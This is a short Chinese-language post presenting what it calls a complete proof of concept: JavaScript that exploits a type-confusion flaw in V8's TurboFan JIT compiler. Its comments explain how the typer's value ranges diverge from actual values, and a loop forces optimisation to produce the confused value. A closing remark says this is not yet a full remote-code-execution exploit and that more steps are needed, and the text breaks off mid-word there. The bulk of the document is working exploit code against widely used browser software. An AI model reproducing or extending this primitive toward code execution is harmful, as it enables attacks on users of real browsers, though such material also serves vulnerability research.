完整Poc：
function bar(a, arg_true) {
let o = {c0: 0, cf: false};
let x = ((a&5)==2)|0;
let y = ((a&6)==1)|0;

"a"[x];"a"[y]; // generate CheckBounds()

x = x + (o.cf ? "" : (2**30) - (o.c0&1)) - (2**30); // type is Range(-1,0), but only after LoadElimination
y = y + (o.cf ? "" : (2**30) - (o.c0&1)) - (2**30);

x = Math.min(2**32-1, x + (2**32-1)) - (2**32-1); // type is Range(-1,0) already during Typer
y = Math.min(2**32-1, y + (2**32-1)) - (2**32-1);
let confused = Math.max(-1,x & y); // type is Range(..., 0), really is 1
confused = Math.max(-1, confused); // type is Range(-1, 0), really is 1
confused = ((0-confused)>>31); // type is Range(0, 0), really is -1
return confused;
}

console.log(bar(3, true));
for (var i = 0; i < 3*10**4; i+=1) bar(0,true);
console.log(bar(3,true));
以上并不是达到rce的完整exp
还需要iterator.nex